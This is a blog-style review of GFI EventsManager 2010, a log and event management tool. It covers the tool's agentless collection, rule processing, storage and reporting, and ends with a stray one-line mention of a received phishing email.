GFI EventsManager 2010 Review
For a long time I wanted to write a review on GFI EventsManager 2010 and I'm glad I'm doing it because for me it's a very good example of software built the right way for the right job at the right time.
Having spent my last 5 years working with SIEM giants like ArcSight and RSA EnVision, I have experienced first hand the benefits and sometimes the downfall of SIEM / ESM solutions.
GFI EventsManger takes a simple and robust aproach to log and event management and this is shown in the way it does the collection of data, the analysis, storage and reporting.
The collection of data is done agentless which is a big plus and the solution can collect and process Windows events, W3C event logs, Syslog messages, SNMP Trap and SQL Server logs. This allows one to collect more data from the different hardware and software systems that are most commonly available on a typical corporate network.
GFI EventsManager offers one of the best asset management interface allowing one to group assets (servers, workstations, netowrk devices) and quickly display events filtered by numerous criteria.
The list of supported devices can be found here (a bit outdated, needs an update to 2010 version) and it includes top vendors in all major security domains :access control, perimeter, endpoint , directory services, content filtering, IDS / IPS, operating systems and much more.
The solution uses two collection engines, the Event Retrieval Engine and the Event Receiving Engine which cover all supported log formats, either passively such as Syslog and SNMP or actively connecting systems handling W3C and Windows events.
Once the events have reached them main processing unit, GFI EventsManager will run a set of event processing rules on the collected events. The solution ships with a rich set of out-of-the-box rules such as :
- Classifying the events as Critical, High, Medium, Low or Noise (which are discarded)
- Filtering events based on specific criteria
- Triggering email, SMS and network alerts on key events
- Triggering remediation actions such as the execution of executable files or scripts on key events
- Optionally archiving collected events in the database backend.
GFI EventsManager uses a MS-SQL database backend which can quickly fill up so the solution provides functionality to disk-archive the main stream of events and save only the important alerts in the database.
Accessing the data is straight forward using Event Browsing which does a great job at presenting the events is an easy-to-read format. Event Browser can also be used as a forensics analysis tool because of it's ease of use in drilling into recorded events.
Reporting is done via the GFI ReportCenter framework which offers consistent reporting features for many GFI products. There is a dedicated ReportPack for GFI EventManager which loads in the reporting framework so you can benefit from the framework powerful reporting features tailored to the specific data provided by EventManager.
Reports can be scheduled and can be sent by email or exported as to various formats including HTML, Adobe Acrobat (PDF), Excel (XLS), Word (DOC), and Rich Text Format (RTF).
Conclusion
GFI EventManager 2010 is a very efficient and effective log and event management tool which covers most of the daily security monitoring activities. However, there is room for expanding this product by adding support for more log formats (ODBC, flat text, vendor specific protocol like CheckPoint OPSEC, etc). Also event normalization and aggregation could improve the in-memory correlation for more complex AI alerts .
Licensing is very affordable for this class of products and it's based on number of nodes reporting events. Also, don't forget that you can always download a full working evaluation version from here .
I just received today a phishing email which had an HTML attachment and of course it asked me to click the attached file. 
